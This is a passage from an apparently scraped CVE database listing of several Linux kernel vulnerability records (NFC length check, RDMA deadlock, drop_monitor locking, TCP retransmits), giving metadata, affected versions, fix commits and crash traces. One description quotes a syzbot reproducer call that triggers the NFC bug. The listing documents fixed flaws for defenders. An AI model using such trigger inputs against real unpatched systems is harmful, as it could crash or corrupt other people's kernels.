"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnfc/nci: Add the inconsistency check between the input data length and count\n\nwrite$nci(r0, \u0026(0x7f0000000740)=ANY=[@ANYBLOB=\"610501\"], 0xf)\n\nSyzbot constructed a write() call with a data length of 3 bytes but a count value\nof 15, which passed too little data to meet the basic requirements of the function\nnci_rf_intf_activated_ntf_packet().\n\nTherefore, increasing the comparison between data length and count value to avoid\nproblems caused by inconsistent data length and count."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:23:45.657Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/f07bcd8bba803c9e6ad2048543185d6c56587a2f"
},
{
"url": "https://git.kernel.org/stable/c/41f5e2840cd0629f049ce5ce2f8dd10a8299de42"
},
{
"url": "https://git.kernel.org/stable/c/056478b4321b36ca33567089d39ac992f6c9c37a"
},
{
"url": "https://git.kernel.org/stable/c/22a72c1c10f43ca645a98725e0faff34592f4d08"
},
{
"url": "https://git.kernel.org/stable/c/068648aab72c9ba7b0597354ef4d81ffaac7b979"
}
],
"title": "nfc/nci: Add the inconsistency check between the input data length and count",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42130",
"datePublished": "2024-07-30T07:46:26.153Z",
"dateReserved": "2024-07-29T15:50:41.186Z",
"dateUpdated": "2025-05-04T09:23:45.657Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48930 (GCVE-0-2022-48930)
Vulnerability from cvelistv5
Published
2024-08-22 03:31
Modified
2025-05-04 08:26
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
RDMA/ib_srp: Fix a deadlock
Remove the flush_workqueue(system_long_wq) call since flushing
system_long_wq is deadlock-prone and since that call is redundant with a
preceding cancel_work_sync()
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: ef6c49d87c3418c442a22e55e3ce2f91b163d69e Version: ef6c49d87c3418c442a22e55e3ce2f91b163d69e Version: ef6c49d87c3418c442a22e55e3ce2f91b163d69e Version: ef6c49d87c3418c442a22e55e3ce2f91b163d69e Version: ef6c49d87c3418c442a22e55e3ce2f91b163d69e Version: ef6c49d87c3418c442a22e55e3ce2f91b163d69e Version: ef6c49d87c3418c442a22e55e3ce2f91b163d69e Version: ef6c49d87c3418c442a22e55e3ce2f91b163d69e |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48930",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:32:52.904087Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:32:59.933Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/infiniband/ulp/srp/ib_srp.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "8cc342508f9e7fdccd2e9758ae9d52aff72dab7f",
"status": "affected",
"version": "ef6c49d87c3418c442a22e55e3ce2f91b163d69e",
"versionType": "git"
},
{
"lessThan": "4752fafb461821f8c8581090c923ababba68c5bd",
"status": "affected",
"version": "ef6c49d87c3418c442a22e55e3ce2f91b163d69e",
"versionType": "git"
},
{
"lessThan": "d7997d19dfa7001ca41e971cd9efd091bb195b51",
"status": "affected",
"version": "ef6c49d87c3418c442a22e55e3ce2f91b163d69e",
"versionType": "git"
},
{
"lessThan": "901206f71e6ad2b2e7accefc5199a438d173c25f",
"status": "affected",
"version": "ef6c49d87c3418c442a22e55e3ce2f91b163d69e",
"versionType": "git"
},
{
"lessThan": "99eb8d694174c777558dc902d575d1997d5ca650",
"status": "affected",
"version": "ef6c49d87c3418c442a22e55e3ce2f91b163d69e",
"versionType": "git"
},
{
"lessThan": "c8b56e51aa91b8e7df3a98388dce3fdabd15c1d4",
"status": "affected",
"version": "ef6c49d87c3418c442a22e55e3ce2f91b163d69e",
"versionType": "git"
},
{
"lessThan": "98d056603ce55ceb90631b3927151c190dfb1b27",
"status": "affected",
"version": "ef6c49d87c3418c442a22e55e3ce2f91b163d69e",
"versionType": "git"
},
{
"lessThan": "081bdc9fe05bb23248f5effb6f811da3da4b8252",
"status": "affected",
"version": "ef6c49d87c3418c442a22e55e3ce2f91b163d69e",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/infiniband/ulp/srp/ib_srp.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.8"
},
{
"lessThan": "3.8",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.9.*",
"status": "unaffected",
"version": "4.9.304",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.14.*",
"status": "unaffected",
"version": "4.14.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.232",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.182",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.26",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.16.*",
"status": "unaffected",
"version": "5.16.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "5.17",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.9.304",
"versionStartIncluding": "3.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.14.269",
"versionStartIncluding": "3.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.232",
"versionStartIncluding": "3.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.182",
"versionStartIncluding": "3.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.103",
"versionStartIncluding": "3.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.26",
"versionStartIncluding": "3.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.16.12",
"versionStartIncluding": "3.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.17",
"versionStartIncluding": "3.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/ib_srp: Fix a deadlock\n\nRemove the flush_workqueue(system_long_wq) call since flushing\nsystem_long_wq is deadlock-prone and since that call is redundant with a\npreceding cancel_work_sync()"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:26:18.842Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/8cc342508f9e7fdccd2e9758ae9d52aff72dab7f"
},
{
"url": "https://git.kernel.org/stable/c/4752fafb461821f8c8581090c923ababba68c5bd"
},
{
"url": "https://git.kernel.org/stable/c/d7997d19dfa7001ca41e971cd9efd091bb195b51"
},
{
"url": "https://git.kernel.org/stable/c/901206f71e6ad2b2e7accefc5199a438d173c25f"
},
{
"url": "https://git.kernel.org/stable/c/99eb8d694174c777558dc902d575d1997d5ca650"
},
{
"url": "https://git.kernel.org/stable/c/c8b56e51aa91b8e7df3a98388dce3fdabd15c1d4"
},
{
"url": "https://git.kernel.org/stable/c/98d056603ce55ceb90631b3927151c190dfb1b27"
},
{
"url": "https://git.kernel.org/stable/c/081bdc9fe05bb23248f5effb6f811da3da4b8252"
}
],
"title": "RDMA/ib_srp: Fix a deadlock",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48930",
"datePublished": "2024-08-22T03:31:23.582Z",
"dateReserved": "2024-08-21T06:06:23.299Z",
"dateUpdated": "2025-05-04T08:26:18.842Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-40980 (GCVE-0-2024-40980)
Vulnerability from cvelistv5
Published
2024-07-12 12:32
Modified
2025-05-21 09:12
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drop_monitor: replace spin_lock by raw_spin_lock
trace_drop_common() is called with preemption disabled, and it acquires
a spin_lock. This is problematic for RT kernels because spin_locks are
sleeping locks in this configuration, which causes the following splat:
BUG: sleeping function called from invalid context at kernel/locking/spinlock_rt.c:48
in_atomic(): 1, irqs_disabled(): 1, non_block: 0, pid: 449, name: rcuc/47
preempt_count: 1, expected: 0
RCU nest depth: 2, expected: 2
5 locks held by rcuc/47/449:
#0: ff1100086ec30a60 ((softirq_ctrl.lock)){+.+.}-{2:2}, at: __local_bh_disable_ip+0x105/0x210
#1: ffffffffb394a280 (rcu_read_lock){....}-{1:2}, at: rt_spin_lock+0xbf/0x130
#2: ffffffffb394a280 (rcu_read_lock){....}-{1:2}, at: __local_bh_disable_ip+0x11c/0x210
#3: ffffffffb394a160 (rcu_callback){....}-{0:0}, at: rcu_do_batch+0x360/0xc70
#4: ff1100086ee07520 (&data->lock){+.+.}-{2:2}, at: trace_drop_common.constprop.0+0xb5/0x290
irq event stamp: 139909
hardirqs last enabled at (139908): [<ffffffffb1df2b33>] _raw_spin_unlock_irqrestore+0x63/0x80
hardirqs last disabled at (139909): [<ffffffffb19bd03d>] trace_drop_common.constprop.0+0x26d/0x290
softirqs last enabled at (139892): [<ffffffffb07a1083>] __local_bh_enable_ip+0x103/0x170
softirqs last disabled at (139898): [<ffffffffb0909b33>] rcu_cpu_kthread+0x93/0x1f0
Preemption disabled at:
[<ffffffffb1de786b>] rt_mutex_slowunlock+0xab/0x2e0
CPU: 47 PID: 449 Comm: rcuc/47 Not tainted 6.9.0-rc2-rt1+ #7
Hardware name: Dell Inc. PowerEdge R650/0Y2G81, BIOS 1.6.5 04/15/2022
Call Trace:
<TASK>
dump_stack_lvl+0x8c/0xd0
dump_stack+0x14/0x20
__might_resched+0x21e/0x2f0
rt_spin_lock+0x5e/0x130
? trace_drop_common.constprop.0+0xb5/0x290
? skb_queue_purge_reason.part.0+0x1bf/0x230
trace_drop_common.constprop.0+0xb5/0x290
? preempt_count_sub+0x1c/0xd0
? _raw_spin_unlock_irqrestore+0x4a/0x80
? __pfx_trace_drop_common.constprop.0+0x10/0x10
? rt_mutex_slowunlock+0x26a/0x2e0
? skb_queue_purge_reason.part.0+0x1bf/0x230
? __pfx_rt_mutex_slowunlock+0x10/0x10
? skb_queue_purge_reason.part.0+0x1bf/0x230
trace_kfree_skb_hit+0x15/0x20
trace_kfree_skb+0xe9/0x150
kfree_skb_reason+0x7b/0x110
skb_queue_purge_reason.part.0+0x1bf/0x230
? __pfx_skb_queue_purge_reason.part.0+0x10/0x10
? mark_lock.part.0+0x8a/0x520
...
trace_drop_common() also disables interrupts, but this is a minor issue
because we could easily replace it with a local_lock.
Replace the spin_lock with raw_spin_lock to avoid sleeping in atomic
context.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 4ea7e38696c7e798c47ebbecadfd392f23f814f9 Version: 4ea7e38696c7e798c47ebbecadfd392f23f814f9 Version: 4ea7e38696c7e798c47ebbecadfd392f23f814f9 Version: 4ea7e38696c7e798c47ebbecadfd392f23f814f9 Version: 4ea7e38696c7e798c47ebbecadfd392f23f814f9 Version: 4ea7e38696c7e798c47ebbecadfd392f23f814f9 Version: 4ea7e38696c7e798c47ebbecadfd392f23f814f9 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:39:55.936Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/594e47957f3fe034645e6885393ce96c12286334"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/96941f29ebcc1e9cbf570dc903f30374909562f5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b3722fb69468693555f531cddda5c30444726dac"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f251ccef1d864790e5253386e95544420b7cd8f3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/76ce2f9125244e1708d29c1d3f9d1d50b347bda0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/07ea878684dfb78a9d4f564c39d07e855a9e242e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f1e197a665c2148ebc25fe09c53689e60afea195"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-40980",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T17:02:23.500077Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:21.510Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/core/drop_monitor.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "594e47957f3fe034645e6885393ce96c12286334",
"status": "affected",
"version": "4ea7e38696c7e798c47ebbecadfd392f23f814f9",
"versionType": "git"
},
{
"lessThan": "96941f29ebcc1e9cbf570dc903f30374909562f5",
"status": "affected",
"version": "4ea7e38696c7e798c47ebbecadfd392f23f814f9",
"versionType": "git"
},
{
"lessThan": "b3722fb69468693555f531cddda5c30444726dac",
"status": "affected",
"version": "4ea7e38696c7e798c47ebbecadfd392f23f814f9",
"versionType": "git"
},
{
"lessThan": "f251ccef1d864790e5253386e95544420b7cd8f3",
"status": "affected",
"version": "4ea7e38696c7e798c47ebbecadfd392f23f814f9",
"versionType": "git"
},
{
"lessThan": "76ce2f9125244e1708d29c1d3f9d1d50b347bda0",
"status": "affected",
"version": "4ea7e38696c7e798c47ebbecadfd392f23f814f9",
"versionType": "git"
},
{
"lessThan": "07ea878684dfb78a9d4f564c39d07e855a9e242e",
"status": "affected",
"version": "4ea7e38696c7e798c47ebbecadfd392f23f814f9",
"versionType": "git"
},
{
"lessThan": "f1e197a665c2148ebc25fe09c53689e60afea195",
"status": "affected",
"version": "4ea7e38696c7e798c47ebbecadfd392f23f814f9",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/core/drop_monitor.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.31"
},
{
"lessThan": "2.6.31",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.279",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.221",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.162",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.96",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.36",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.279",
"versionStartIncluding": "2.6.31",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.221",
"versionStartIncluding": "2.6.31",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.162",
"versionStartIncluding": "2.6.31",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.96",
"versionStartIncluding": "2.6.31",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.36",
"versionStartIncluding": "2.6.31",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.7",
"versionStartIncluding": "2.6.31",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "2.6.31",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrop_monitor: replace spin_lock by raw_spin_lock\n\ntrace_drop_common() is called with preemption disabled, and it acquires\na spin_lock. This is problematic for RT kernels because spin_locks are\nsleeping locks in this configuration, which causes the following splat:\n\nBUG: sleeping function called from invalid context at kernel/locking/spinlock_rt.c:48\nin_atomic(): 1, irqs_disabled(): 1, non_block: 0, pid: 449, name: rcuc/47\npreempt_count: 1, expected: 0\nRCU nest depth: 2, expected: 2\n5 locks held by rcuc/47/449:\n #0: ff1100086ec30a60 ((softirq_ctrl.lock)){+.+.}-{2:2}, at: __local_bh_disable_ip+0x105/0x210\n #1: ffffffffb394a280 (rcu_read_lock){....}-{1:2}, at: rt_spin_lock+0xbf/0x130\n #2: ffffffffb394a280 (rcu_read_lock){....}-{1:2}, at: __local_bh_disable_ip+0x11c/0x210\n #3: ffffffffb394a160 (rcu_callback){....}-{0:0}, at: rcu_do_batch+0x360/0xc70\n #4: ff1100086ee07520 (\u0026data-\u003elock){+.+.}-{2:2}, at: trace_drop_common.constprop.0+0xb5/0x290\nirq event stamp: 139909\nhardirqs last enabled at (139908): [\u003cffffffffb1df2b33\u003e] _raw_spin_unlock_irqrestore+0x63/0x80\nhardirqs last disabled at (139909): [\u003cffffffffb19bd03d\u003e] trace_drop_common.constprop.0+0x26d/0x290\nsoftirqs last enabled at (139892): [\u003cffffffffb07a1083\u003e] __local_bh_enable_ip+0x103/0x170\nsoftirqs last disabled at (139898): [\u003cffffffffb0909b33\u003e] rcu_cpu_kthread+0x93/0x1f0\nPreemption disabled at:\n[\u003cffffffffb1de786b\u003e] rt_mutex_slowunlock+0xab/0x2e0\nCPU: 47 PID: 449 Comm: rcuc/47 Not tainted 6.9.0-rc2-rt1+ #7\nHardware name: Dell Inc. PowerEdge R650/0Y2G81, BIOS 1.6.5 04/15/2022\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x8c/0xd0\n dump_stack+0x14/0x20\n __might_resched+0x21e/0x2f0\n rt_spin_lock+0x5e/0x130\n ? trace_drop_common.constprop.0+0xb5/0x290\n ? skb_queue_purge_reason.part.0+0x1bf/0x230\n trace_drop_common.constprop.0+0xb5/0x290\n ? preempt_count_sub+0x1c/0xd0\n ? _raw_spin_unlock_irqrestore+0x4a/0x80\n ? __pfx_trace_drop_common.constprop.0+0x10/0x10\n ? rt_mutex_slowunlock+0x26a/0x2e0\n ? skb_queue_purge_reason.part.0+0x1bf/0x230\n ? __pfx_rt_mutex_slowunlock+0x10/0x10\n ? skb_queue_purge_reason.part.0+0x1bf/0x230\n trace_kfree_skb_hit+0x15/0x20\n trace_kfree_skb+0xe9/0x150\n kfree_skb_reason+0x7b/0x110\n skb_queue_purge_reason.part.0+0x1bf/0x230\n ? __pfx_skb_queue_purge_reason.part.0+0x10/0x10\n ? mark_lock.part.0+0x8a/0x520\n...\n\ntrace_drop_common() also disables interrupts, but this is a minor issue\nbecause we could easily replace it with a local_lock.\n\nReplace the spin_lock with raw_spin_lock to avoid sleeping in atomic\ncontext."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-21T09:12:48.758Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/594e47957f3fe034645e6885393ce96c12286334"
},
{
"url": "https://git.kernel.org/stable/c/96941f29ebcc1e9cbf570dc903f30374909562f5"
},
{
"url": "https://git.kernel.org/stable/c/b3722fb69468693555f531cddda5c30444726dac"
},
{
"url": "https://git.kernel.org/stable/c/f251ccef1d864790e5253386e95544420b7cd8f3"
},
{
"url": "https://git.kernel.org/stable/c/76ce2f9125244e1708d29c1d3f9d1d50b347bda0"
},
{
"url": "https://git.kernel.org/stable/c/07ea878684dfb78a9d4f564c39d07e855a9e242e"
},
{
"url": "https://git.kernel.org/stable/c/f1e197a665c2148ebc25fe09c53689e60afea195"
}
],
"title": "drop_monitor: replace spin_lock by raw_spin_lock",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-40980",
"datePublished": "2024-07-12T12:32:15.569Z",
"dateReserved": "2024-07-12T12:17:45.604Z",
"dateUpdated": "2025-05-21T09:12:48.758Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-41007 (GCVE-0-2024-41007)
Vulnerability from cvelistv5
Published
2024-07-15 08:48
Modified
2025-05-04 09:19
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
tcp: avoid too many retransmit packets
If a TCP socket is using TCP_USER_TIMEOUT, and the other peer
retracted its window to zero, tcp_retransmit_timer() can
retransmit a packet every two jiffies (2 ms for HZ=1000),
for about 4 minutes after TCP_USER_TIMEOUT has 'expired'.
The fix is to make sure tcp_rtx_probe0_timed_out() takes
icsk->icsk_user_timeout into account.
Before blamed commit, the socket would not timeout after
icsk->icsk_user_timeout, but would use standard exponential
backoff for the retransmits.
Also worth noting that before commit e89688e3e978 ("net: tcp:
fix unexcepted socket die when snd_wnd is 0"), the issue
would last 2 minutes instead of 4.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: b701a99e431db784714c32fc6b68123045714679 Version: b701a99e431db784714c32fc6b68123045714679 Version: b701a99e431db784714c32fc6b68123045714679 Version: b701a99e431db784714c32fc6b68123045714679 Version: b701a99e431db784714c32fc6b68123045714679 Version: b701a99e431db784714c32fc6b68123045714679 Version: b701a99e431db784714c32fc6b68123045714679 Version: b701a99e431db784714c32fc6b68123045714679 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:39:56.161Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7bb7670f92bfbd05fc41a8f9a8f358b7ffed65f4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d2346fca5bed130dc712f276ac63450201d52969"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5d7e64d70a11d988553a08239c810a658e841982"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/04317a2471c2f637b4c49cbd0e9c0d04a519f570"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e113cddefa27bbf5a79f72387b8fbd432a61a466"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/dfcdd7f89e401d2c6616be90c76c2fac3fa98fde"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/66cb64a1d2239cd0309f9b5038b05462570a5be1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/97a9063518f198ec0adb2ecb89789de342bb8283"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-41007",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T17:00:52.460807Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:18.296Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/ipv4/tcp_timer.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "7bb7670f92bfbd05fc41a8f9a8f358b7ffed65f4",
"status": "affected",
"version": "b701a99e431db784714c32fc6b68123045714679",
"versionType": "git"
},
{
"lessThan": "d2346fca5bed130dc712f276ac63450201d52969",
"status": "affected",
"version": "b701a99e431db784714c32fc6b68123045714679",
"versionType": "git"
},
{
"lessThan": "5d7e64d70a11d988553a08239c810a658e841982",
"status": "affected",
"version": "b701a99e431db784714c32fc6b68123045714679",
"versionType": "git"
},
{
"lessThan": "04317a2471c2f637b4c49cbd0e9c0d04a519f570",
"status": "affected",
"version": "b701a99e431db784714c32fc6b68123045714679",
"versionType": "git"
},
{
"lessThan": "e113cddefa27bbf5a79f72387b8fbd432a61a466",
"status": "affected",
"version": "b701a99e431db784714c32fc6b68123045714679",
"versionType": "git"
},
{
"lessThan": "dfcdd7f89e401d2c6616be90c76c2fac3fa98fde",
"status": "affected",
"version": "b701a99e431db784714c32fc6b68123045714679",
"versionType": "git"
},
{
"lessThan": "66cb64a1d2239cd0309f9b5038b05462570a5be1",
"status": "affected",
"version": "b701a99e431db784714c32fc6b68123045714679",
"versionType": "git"
},
{
"lessThan": "97a9063518f198ec0adb2ecb89789de342bb8283",
"status": "affected",
"version": "b701a99e431db784714c32fc6b68123045714679",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/ipv4/tcp_timer.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.19"
},
{
"lessThan": "4.19",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.318",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.280",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.222",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.163",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.100",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.41",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
